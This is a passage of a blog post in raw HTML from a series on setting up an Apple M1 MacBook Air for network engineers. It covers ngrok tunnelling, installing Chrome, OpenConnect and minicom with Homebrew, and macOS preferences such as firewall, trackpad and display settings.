ngrok http 8000</b></p><p><span style="font-family: courier; font-size: x-small;">ngrok by @inconshreveable (Ctrl+C to quit)</span></p><p><span style="font-family: courier; font-size: x-small;">Session Status online</span></p><p><span style="font-family: courier; font-size: x-small;">Session Expires 1 hour, 59 minutes</span></p><p><span style="font-family: courier; font-size: x-small;">Version 2.3.35</span></p><p><span style="font-family: courier; font-size: x-small;">Region United States (us)</span></p><p><span style="font-family: courier; font-size: x-small;">Web Interface http://127.0.0.1:4040</span></p><p><span style="font-family: courier; font-size: x-small;">Forwarding http://441c7dc90556.ngrok.io -> http://localhost:8000</span></p><p><span style="font-family: courier; font-size: x-small;">Forwarding https://441c7dc90556.ngrok.io -> http://localhost:8000</span></p><p><span style="font-family: courier; font-size: x-small;"><br /></span></p><p><span style="font-family: courier; font-size: x-small;">Connections ttl opn rt1 rt5 p50 p90</span></p><p><span style="font-family: courier; font-size: x-small;"> 0 0 0.00 0.00 0.00 0.00</span></p><p><span style="font-family: courier; font-size: x-small;"><br /></span></p><p><span style="font-family: inherit;">Now start a python http server on port 8000 in a new iTerm tab</span></p><p><span style="font-family: inherit;">python http.server 8000</span></p><p><span style="font-family: inherit;">Open a browser and enter</span></p><p><span style="font-family: inherit;">http://441c7dc90556.ngrok.io</span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuBPZ4MH3TA1B8epzW7pvIJ9zRLVEGjr6ct_mU0NDC4BTFfBWvxa5MRQJRo3x1vWE-EBmCNouYeBfihochxlWoc2vU1FBfpCOAlCpQc1fnz2aMyLWGznEOEdBODhTy1vtM0QNEHjEfQ7EE/s678/ngrok.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="286" data-original-width="678" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuBPZ4MH3TA1B8epzW7pvIJ9zRLVEGjr6ct_mU0NDC4BTFfBWvxa5MRQJRo3x1vWE-EBmCNouYeBfihochxlWoc2vU1FBfpCOAlCpQc1fnz2aMyLWGznEOEdBODhTy1vtM0QNEHjEfQ7EE/w465-h196/ngrok.png" width="465" /></a></div><p>You will need to allow Python to accept incoming connections in System Preferences, Security & Privacy. The easiest way to do that is to stop/start the firewall after you start the Python web server. It will ask if you want to allow incoming connections to the python server.</p><p>This blog has some demos on ngrok. It's a little dated but still useful.</p><p><a href="https://www.twilio.com/blog/2016/12/localhost-tunneling-ngrok-mac-os-x.html">Ngrok with macOS</a><br /></p><p><br /></p><p><br /></p><h3 id="chrome" style="text-align: left;">Google Chrome</h3><p></p><p><b>brew install --cask google-chrome</b></p><p>Chrome is a universal app now.</p><p><br /></p><p><br /></p><h3 id="open" style="text-align: left;">Open Connect</h3><p>An open source VPN client that can be used to connect to Cisco DevNet labs.</p><p>You will need Open Connect if you are working on the Cisco DevNet cert</p><p><b>Brew install --cask openconnect-gui</b></p><p><br /></p><p><br /></p><h3 id="minicom" style="text-align: left;">Minicom</h3><p>minicom is an terminal app that allows you to connect to USB to Serial cables and console into devices. </p><p><b>brew install minicom</b></p><p>To set the "Meta" key to be the Mac Option key</p><p>Terminal > Preferences... (or type ⌘+,). Then, Profiles > Keyboard and check the box Use Option as Meta key.</p><p>https://www.shell-tips.com/mac/meta-key/</p><p>Before starting minicom you need to know the name of the com port that macOS assigned to your USB adapter. Open a terminal and enter:</p><p>ls -l /dev/tty.usb*</p><p>You should see something like this:</p><p><span style="font-family: courier; font-size: x-small;">ls -l /dev/tty.usb*</span></p><p><span style="font-family: courier; font-size: x-small;">crw-rw-rw- 1 root wheel 9, 6 Mar 15 15:54 /dev/tty.usbserial-1140</span></p><p>The first time you run minicom use</p><p><b>minicom -s</b> </p><p>to enter setup mode. Scroll down to "Serial port setup" and press enter.</p><p>Use <span style="font-family: courier; font-size: small;">/dev/tty.usbserial-1140 for option A - Serial Device.</span></p><p><br /></p><p>If you use a different USB cable you can start with:</p><p>minicom -D /dev/tty.usbserial-(name of new cable)</p><p>Logging</p><p>You can use -C (path/filename) to save a log.</p><p><span style="font-family: courier; font-size: small;"><br /></span></p><p><span style="font-family: inherit; font-size: small;">That's enough for one blog! In the next installment, I will cover more networking tools like iPerf3, Wireshark, arp-scan, etc. Be sure to check back soon.</span></p><p><br /></p><p><br /></p><p></p><p></p><p></p><p></p><p></p><p></p></div></div>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com9tag:blogger.com,1999:blog-690329124282786689.post-35221443842345097862021-03-14T23:13:00.053-07:002022-01-01T21:03:20.448-08:00Apple MacBook Air M1 for Network Engineers Part 1<p>Parts 2 -5 are now published. You can find them </p><p></p><ul style="text-align: left;"><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html">Apple MacBook Air M1 for Network Engineers Part 2</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html">Apple MacBook Air M1 for Network Engineers Part 3</a></li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html">Apple MacBook Air M1 for Network Engineers Part 4</a></li><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html">Apple MacBook Air M1 for Network Engineers Part 5</a></li></ul><p></p><p>I haven't used a Mac as a daily driver for a few years. I switched over to Ubuntu when I started working on my python, Git, and dev skills for the Cisco Devnet program. Ubuntu is a great platform for dev work because there are so many free, open-source tools and it will run on almost any hardware from a Raspberry Pi to a maxed-out desktop. </p><p>But I had to have a new Mac once the ARM-based Apple Silicon Macs were announced! Battery life was the biggest factor but I also wanted the instant-on, iPad-like performance of the Apple Silicon. It makes me smile every time I open the lid and it is just ready to go. Add in Touch-ID, Retina display, and the Big Sur version of macOS and it made the money jump right out of my wallet!</p><p>I hadn't used Big Sur since my current MacBook is a 2012 MacBook Pro, so I had some research to do. Luckily there are plenty of YouTube videos with tips on setting up the new M1 Macs and on the new features of Big Sur. </p><p>Some videos to get you started:</p><p></p><ul style="text-align: left;"><li><a href="https://www.youtube.com/watch?v=H7BoSWr8u3w">25 macOS Tips and Tricks you need to know!</a></li><li><a href="https://www.youtube.com/watch?v=AMkIcGYuA14">Hidden macOS Finder Tips you probably don't know</a></li><li><a href="https://www.youtube.com/watch?v=IesYt9MkALA">15 Obscure System Preferences You Should Know About</a><br /></li><li><a href="https://www.youtube.com/watch?v=dHdl1Wf6xrA">Mac Basics: Customizing Toolbars</a><br /></li><li><a href="https://www.youtube.com/watch?v=J09jrt9FNO8">Complex File Searches Using the macOS Finder</a><br /></li><li><a href="https://www.youtube.com/watch?v=L1xsPlg96xc">How To Switch Between Mac Apps, Desktops, Windows, and Tabs</a><br /></li><li><a href="https://www.youtube.com/watch?v=Sji7G5D5ooc">10 Mac Features That Will Save You Time</a><br /></li><li><a href="https://www.youtube.com/watch?v=dHdl1Wf6xrA">Mac Basics: Customizing Toolbars</a><br /></li></ul><p></p><p>Some useful webpages</p><div style="text-align: left;"><a href="https://support.apple.com/en-us/HT204216">Mac tips for Windows switchers</a><br /></div><div style="text-align: left;"><a href="https://eshop.macsales.com/blog/58609-10-fantastic-finder-tips/">10 FANTASTIC MAC FINDER TIPS<br /></a><a href="https://support.apple.com/guide/mac-help/choose-an-app-to-open-a-file-on-mac-mh35597/mac https://support.apple.com/guide/mac-help/choose-an-app-to-open-a-file-on-mac-mh35597/mac">Choose an app to open a file on Mac<br /></a><a href="https://support.apple.com/guide/mac-help/change-finder-preferences-on-mac-mchlp2803/mac">Change Finder preferences on Mac<br /></a><a href="https://padbury.app">Padbury Clock Screen Saver<br /></a><a href="https://manytricks.com/moom/">Moom - Move/Zoom windows</a></div><div style="text-align: left;"><a href="https://macmost.com/printable-mac-keyboard-shortcut-page-for-macos-big-sur.html">Printable keyboard shortcut page for macOS Big Sur</a><br /></div><div style="text-align: left;"><a href="https://eshop.macsales.com/blog/78632-running-diagnostics-on-an-apple-silicon-mac/">Running Diagnostics o an Apple Silicon MAC</a><br /></div><div style="text-align: left;"><a href="https://support.apple.com/guide/mail/search-for-emails-mlhlp1003/14.0/mac/11.0">Search for emails in Mail on Mac</a> - If you decide to use Apple Mail, this is useful.<br /></div><div style="text-align: left;"><a href="https://www.youtube.com/watch?v=uWhZdO6oL8w">23 Tips For Using Desktop Spaces On Your Mac</a><br /></div><div style="text-align: left;"><a href="https://eshop.macsales.com/blog/79255-12-days-of-backups-day-1-time-machine/?trk_msg=1S7PF0G4K4C49E2NRTKPK348R4&trk_contact=84SAVRS5T0O4TPLJVD64JKTDM4&trk_sid=G8SR8COBGQR4EMAGKH9R29T30C&trk_link=7CQIUDBPDK7KR9SPVUNN3DTV04&APC=READERSPC&utm_source=listrak&utm_medium=email&utm_term=https%3a%2f%2feshop.macsales.com%2fblog%2f79255-12-days-of-backups-day-1-time-machine%2f&utm_campaign=2022-01-01_Rocket_Yard_Weekly"><span style="font-family: inherit;">12 DAYS OF BACKUPS: DAY 1 – TIME MACHINE</span></a><br /></div><p><br /></p><p>I also used a few podcasts:</p><p></p><ul style="text-align: left;"><li>Mac Geek Gab</li><li>Mac Power Users</li><li>Automators</li></ul><p></p><p>to get up to speed. </p><p>They are two different kinds of podcasts. Mac Geek Gab focuses on "Cool Stuff Found" which is hardware/software that works with the Mac and "Quick Tips" which are tips on using IOS and macOS.</p><p>Mac Power Users is a podcast on getting maximum productivity out of macOS. I don't use most of the software that they recommend. Most of the software is subscription-based and it gets out of control fast. But, they offer a lot of productivity tips for macOS itself and I find the podcast worth my time to listen to.</p><h4 style="text-align: left;">One quick tip for wireless:</h4><p>Hold down the option key while clicking on the wifi icon to get additional information on the connection. It's great to be able to see the channel, MCS, RSSI, Noise Floor, transmit rate, and Phy Mode instantly.</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7pD5N-I8SgyHbzcBqtA72FDrgJRNahlhBtklBqYe8bgWQtSBBLsrKUUPMVMRCZ34wgMw7111YksSq7q1AACgZCtuHVYlyIwmjMu5u567uB6bUcjgJDZrBm4XtldGlXHh1FsTOXvmBpC82/s1112/Screen+Shot+2021-04-11+at+22.44.23.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1112" data-original-width="594" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7pD5N-I8SgyHbzcBqtA72FDrgJRNahlhBtklBqYe8bgWQtSBBLsrKUUPMVMRCZ34wgMw7111YksSq7q1AACgZCtuHVYlyIwmjMu5u567uB6bUcjgJDZrBm4XtldGlXHh1FsTOXvmBpC82/w299-h560/Screen+Shot+2021-04-11+at+22.44.23.png" width="299" /></a></div><br /><p><b>One quick tip for Bluetooth:</b></p><p>If you are having trouble with Bluetooth devices you can try resetting the Bluetooth module. Simply press the Shift + Option keys, then click on the Bluetooth icon in the menu bar. You will see an option to "Reset the Bluetooth module". Click on it and the Bluetooth will be reset. </p><p>You won't have to re-pair the devices, this just resets the Bluetooth module. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqiNzNYd9isQgWSPTsiwtNdVBaBDSlSTjH5rZliHQnJt6LkgUdc0jeBg_bR5tmyt4gBR1ennAeldxVoIKOU9zdqBqkium7K5U3JP3qq_CkhUZzsDIVE_emlCC0QMxyvsziDVQ6hq2TATKr/s313/Screen+Shot+2021-07-19+at+13.55.21.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqiNzNYd9isQgWSPTsiwtNdVBaBDSlSTjH5rZliHQnJt6LkgUdc0jeBg_bR5tmyt4gBR1ennAeldxVoIKOU9zdqBqkium7K5U3JP3qq_CkhUZzsDIVE_emlCC0QMxyvsziDVQ6hq2TATKr/s0/Screen+Shot+2021-07-19+at+13.55.21.png" /></a></div><div><br /></div>As you can see, you can factory reset all connected Apple devices or remove all devices.<br /><p>TIP: If you need to save a file to a system location such as an nmap script to "/usr/loca/share/nmap/scripts", you can press shift+cmd+g" to open a "go to folder" dialog. Type the path into the dialog. Tab completion is supported.<br /><br /><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVX2SFrtoGcNb1glTFXyBh2wE35lqB6VRuiyMfECCnyNePOoj-2Aw1EBhVy3WK1T-MeBA9hVdnHd3oVF1oKpo8W9_ZCPC-OP9qMcXMFjHrRuaeBQKUBMKYG79jz1V9Vbk57_Ffqm6fRU6U/s858/Screen+Shot+2021-09-04+at+23.25.41.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="858" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVX2SFrtoGcNb1glTFXyBh2wE35lqB6VRuiyMfECCnyNePOoj-2Aw1EBhVy3WK1T-MeBA9hVdnHd3oVF1oKpo8W9_ZCPC-OP9qMcXMFjHrRuaeBQKUBMKYG79jz1V9Vbk57_Ffqm6fRU6U/w389-h112/Screen+Shot+2021-09-04+at+23.25.41.png" width="389" /></a></div><br /><p><br /></p><p><br /></p><h2 style="text-align: left;">Initial Setup</h2><p>Apple has a startup script that did a good job of getting me logged in and working. But I learned a lot from the videos and podcasts so I did some customizing.</p><h3 style="text-align: left;">Preferences</h3><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;">If you are moving from Windows or Linux, macOS has some defaults that you will probably want to change. The first thing I did was use the System Preferences app to fix them. On macOS, you move the mouse to the top left of the screen and click on the Apple icon to open system preferences.</p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><h4 style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px; text-align: left;">Change the view to Organize alphabetically</h4><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;">On the View menu, select "Organize Alphabetically" instead of the default "Organize by Categories".</p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;">Now preferences will look like this:</p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUP8WHcDNNi7Pl64OrjKsdyG94wL88svMMWOFjRtFxEVVyh3yLEXofDOwDuXkzkpWIIJ_Tix60sCM-0r3c5nm1AxzL1xbBqkwbxTQB6ZsIEr6KMTOPQ4AFJedSiCB_874fDKHb0iUvHZGM/s669/Screen+Shot+2021-07-19+at+22.18.04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="568" data-original-width="669" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUP8WHcDNNi7Pl64OrjKsdyG94wL88svMMWOFjRtFxEVVyh3yLEXofDOwDuXkzkpWIIJ_Tix60sCM-0r3c5nm1AxzL1xbBqkwbxTQB6ZsIEr6KMTOPQ4AFJedSiCB_874fDKHb0iUvHZGM/w367-h312/Screen+Shot+2021-07-19+at+22.18.04.png" width="367" /></a></div><br /><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;">You can also hide any icons that you are sure you won't need. On the View menu, click Customize. Checkmarks will appear on each icon. Uncheck any that you don't want to see.</p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><h4 style="text-align: left;">General Category</h4><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;">Show scroll bars:</p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span> Always</span><br /></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;">This turns the scroll bars on all the time. The default is to hide them until you click into a window in Finder. I find that very annoying.</p><h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">Apple ID</h4><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span> </span>iCloud Drive, options - turn off Desktop & Documents</p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;">If you don't do this and you are on-site with no Internet service your files will not be available</p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhyphenhyphenVViu-eZLaftX522xDyqhD21injKvtkIIr8ivWYDe7Q9WP2NpnU-PldpAC5qUNpJNpAFDoqQlya5Md8IKEQlrE9ymYmVbS3AuXrY5ATi6oZpgdbv5zywDcHER3hZp0P_M4woy46EUpzr/s1090/iCloud.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="912" data-original-width="1090" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhyphenhyphenVViu-eZLaftX522xDyqhD21injKvtkIIr8ivWYDe7Q9WP2NpnU-PldpAC5qUNpJNpAFDoqQlya5Md8IKEQlrE9ymYmVbS3AuXrY5ATi6oZpgdbv5zywDcHER3hZp0P_M4woy46EUpzr/w406-h340/iCloud.png" width="406" /></a></div><br /><h4 style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px; text-align: left;"><br /></h4><h4 style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px; text-align: left;">Security & Privacy</h4><div><br /></div><h4 style="text-align: left;">General</h4><div>You can set a message that will show on the lock screen. I do this in case a customer doesn't know it's mine and sees it in the data center.</div><div><br /></div><div><ul style="text-align: left;"><li>Click the lock in the lower left and enter your password. </li><li>Put a check in the box next to "Show a message when the screen is locked.</li><li>Click on the drop-down "Set Lock Message..."</li></ul></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxw5J2HQ_QaY8HBLohoaQxQjEGdvo4RVlrnnasceujfWs2O2q7EOirhzhJZELrffG-g9THG7QnR1SJca55BLspjpLaT_bvOacIwZGOkdN4f3vQJ-pu61w8ACoa9oRto0BEsCrt-X_zQkV6/s1560/Screen+Shot+2021-04-10+at+21.49.17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1398" data-original-width="1560" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxw5J2HQ_QaY8HBLohoaQxQjEGdvo4RVlrnnasceujfWs2O2q7EOirhzhJZELrffG-g9THG7QnR1SJca55BLspjpLaT_bvOacIwZGOkdN4f3vQJ-pu61w8ACoa9oRto0BEsCrt-X_zQkV6/w393-h352/Screen+Shot+2021-04-10+at+21.49.17.png" width="393" /></a></div><h4 style="text-align: left;"><ul style="font-weight: 400;"><li>Enter your message and click OK.</li><li>Click the lock again to lock the General settings</li></ul><div><span style="font-weight: 400;"><br /></span></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-EKLfWXFmKneI5SItrzSyLTv9S2eUYK5Yas0UyEbAN51bjxIM3aPzQm7sK-l8r7CvNmzWq55j1NikR8QwGbVb1PFsDON-9KMktFyvy2enBZNYIObHI2Jbbd18Xu9vdenUeSbRAbTMqXft/s706/Screen+Shot+2021-04-11+at+16.56.25.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="346" data-original-width="706" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-EKLfWXFmKneI5SItrzSyLTv9S2eUYK5Yas0UyEbAN51bjxIM3aPzQm7sK-l8r7CvNmzWq55j1NikR8QwGbVb1PFsDON-9KMktFyvy2enBZNYIObHI2Jbbd18Xu9vdenUeSbRAbTMqXft/w350-h172/Screen+Shot+2021-04-11+at+16.56.25.png" width="350" /></a></div><br /><span style="font-weight: 400;"><br /></span></div></h4><h4 style="text-align: left;">Firewall</h4><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px; text-align: left;">By default the firewall is disabled. You should enable it.<br /><span> </span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px; text-align: left;"><span><span> </span>Firewall<br /></span><span><span> </span><span> Click - Turn On Firewall</span></span></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px; text-align: left;"><span><span><br /></span></span></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><span></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEhOqOoW81GcgU6kzNy6IVrx3Jy9ybL1dk3mWMr8kXKwBI245A5UR-69TlTyHJUckAAzyd6lVGUdZHoD8_ap0nytIHttQ-ukFggaFB3HbI-zUqYQ2hOHTq1JBHgqAa3hdAqYgzJSTPx7UF/s1210/Firewall.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="298" data-original-width="1210" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEhOqOoW81GcgU6kzNy6IVrx3Jy9ybL1dk3mWMr8kXKwBI245A5UR-69TlTyHJUckAAzyd6lVGUdZHoD8_ap0nytIHttQ-ukFggaFB3HbI-zUqYQ2hOHTq1JBHgqAa3hdAqYgzJSTPx7UF/w553-h136/Firewall.png" width="553" /></a></div><br /><span><br /></span><p></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><span> </span><br /></p><h4 style="text-align: left;">Trackpad</h4><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span><span style="font-size: 13px;"> </span>Point & Click</span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"></p><ul style="text-align: left;"><li><span><span>A lot of Mac users check the "Tap to Click" option. I tried it and didn't like it. You should give it a shot, maybe it will work for you.</span></span></li><li>Click - Set to Firm</li></ul><p></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_RQ2oR1Jp_TbztEFUsJiwqFKz1sUb3di_7AZnse-LQXIhKLMljdqRxlh2ti-JK7h9BQgWwGb7UUvMsVqM7GsrJtORlw1dRzTZSawmudoJB642CicjbuzglmC2wwtrYaHKkzhE7ktUaxcU/s780/Trackpad.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="780" height="423" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_RQ2oR1Jp_TbztEFUsJiwqFKz1sUb3di_7AZnse-LQXIhKLMljdqRxlh2ti-JK7h9BQgWwGb7UUvMsVqM7GsrJtORlw1dRzTZSawmudoJB642CicjbuzglmC2wwtrYaHKkzhE7ktUaxcU/w513-h423/Trackpad.png" width="513" /></a></div><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><span> </span></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><span><br /></span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span>More Gestures</span><br /></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span><span> <span> Click the More Gestures tab and enable App Expose. I used the Swipe down with four fingers gesture.</span></span></span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span><span><span><br /></span></span></span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span><span><span> App Expose is used to show all windows of an application on the screen. </span></span><br /></span></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><span><span><span><br /></span></span></span></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px;"><span><span></span></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgg8YF-HvIhGqoB6uOrJDlMrrkVlAIKBTeEb6T2sNT0bXfuduaEa7M_IeLlbQaXb8S0LR6OxnQFyzyZJ0LSDNJTKJLlBcyZLu2gdJ7ZP_DfXH5kR58both9bIu-nG_L1FUa6G-4JY6OSYIf/s780/TrackPad-More.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="780" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgg8YF-HvIhGqoB6uOrJDlMrrkVlAIKBTeEb6T2sNT0bXfuduaEa7M_IeLlbQaXb8S0LR6OxnQFyzyZJ0LSDNJTKJLlBcyZLu2gdJ7ZP_DfXH5kR58both9bIu-nG_L1FUa6G-4JY6OSYIf/w511-h420/TrackPad-More.png" width="511" /></a></div><div>I found that in the Mission Control preference panel you can setup "Application Windows" to use different keys. I set the CMD key on the right side to show the application windows. I like that better than the four-finger swipe.</div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2EahJXUbH_Phi70Y5bfnrrimdW97WdKGKF-6TFqZG2cNI57BXLDB6sqUpM9FN_xYb6H-IzxNhpjiwAB0YauuWTidjTivxOcQ5iTYj5V2-4gcdkP7vXjG7MPoLUFhpK8yJDg6WOjF6x7pJ/s1560/Screen+Shot+2021-04-17+at+10.33.41.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1210" data-original-width="1560" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2EahJXUbH_Phi70Y5bfnrrimdW97WdKGKF-6TFqZG2cNI57BXLDB6sqUpM9FN_xYb6H-IzxNhpjiwAB0YauuWTidjTivxOcQ5iTYj5V2-4gcdkP7vXjG7MPoLUFhpK8yJDg6WOjF6x7pJ/w431-h334/Screen+Shot+2021-04-17+at+10.33.41.png" width="431" /></a></div><br /><div><br /></div><h4 style="text-align: left;">Display</h4><div>Night Shift will change the display color slightly towards to warmer end of the spectrum. This is supposed to help you relax when using the laptop at night. I have it set to run from sunset to sunrise. When it activates, a checkmark will appear in the "Turn on Until Sunrise" box.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvMS7lyKOF189QQ3fOn62CthUnQZrs68GhNaFb9vk8Rgr6B9g0SHkvHiOVizY2Gsi3F5KonKaYYwdvqKPzvojJZ8xLnTFTpBvzmvf53whncTaAV08SHyMqHp_3J7lMq-38TDQn6rlTGIrf/s1560/Screen+Shot+2021-04-10+at+22.14.57.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="946" data-original-width="1560" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvMS7lyKOF189QQ3fOn62CthUnQZrs68GhNaFb9vk8Rgr6B9g0SHkvHiOVizY2Gsi3F5KonKaYYwdvqKPzvojJZ8xLnTFTpBvzmvf53whncTaAV08SHyMqHp_3J7lMq-38TDQn6rlTGIrf/w466-h283/Screen+Shot+2021-04-10+at+22.14.57.png" width="466" /></a></div><div><br /><p></p><h4 style="text-align: left;">Desktop</h4><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px;"><span><span> </span><b>Apple, Colors</b></span></p><p style="font-family: "Helvetica Neue"; font-stretch: normal; line-height: normal; margin: 0px; text-align: justify;"><span><span> I'm going for maximum battery life and minimum distraction so I set the desktop to solid black. One interesting </span></span>side effect is that I use a DisplayLink monitor in the field. While setting it up I thought it wasn't working. <span><span>After some time troubleshooting, I realized that with no apps moved to it I was looking at the black desktop and </span></span>it was working! Just a heads up.</p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px; text-align: justify;"><span><span><br /></span></span></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px; text-align: justify;"><span><span><br /></span></span></p><p style="font-family: "Helvetica Neue"; font-size: 13px; font-stretch: normal; line-height: normal; margin: 0px; text-align: justify;"><span></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA0SyNQqymaDlbs7oYbEXbLc4zRRniLC3qMVISu-oNZC4lS0GuFRk-u2vPqlg4ZgRgApl6bDEQntJRQjoWqdlv1dw1DRLs35lJWZLH2vkBg1BMjxYRi0ZR2KPo2b6UvZ3lNlsw_4MsGpUj/s780/Black-Desktop.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="688" data-original-width="780" height="433" 